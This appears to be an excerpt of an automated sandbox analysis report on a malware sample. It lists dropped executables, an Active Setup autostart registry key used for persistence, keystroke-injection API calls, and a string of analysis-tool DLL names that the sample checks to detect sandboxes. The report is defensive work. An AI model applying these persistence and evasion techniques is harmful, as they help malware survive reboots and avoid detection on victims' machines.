Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\putt.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC32D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC39B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFFBE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSIFFEE.tmp	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC3DB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC534.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC32D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC39B.tmp	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\System32\msiexec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA} StubPath	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA} StubPath	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA} Version	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{8549544C-E110-43F1-890F-41A5D528F5AA} Version	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		32_2_005826DD
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0050FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		32_2_0050FC7C

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Participating.com, 00000020.00000002.2529145325.0000000004AF1000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
Source: Participating.com, 00000020.00000003.2174800196.00000000011F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6741			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3011			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFEE1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFEB1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC3DB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFDC5.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE52.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFF11.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC32D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC39B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFFBE.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFFEE.tmp	Jump to dropped file

Source: C:\Windows\Installer\MSIC534.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_12-35556

Source: C:\Windows\Installer\MSIC534.tmp	API coverage: 6.0 %
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	API coverage: 3.9 %

Source: C:\Windows\System32\msiexec.exe TID: 5616	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7808	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
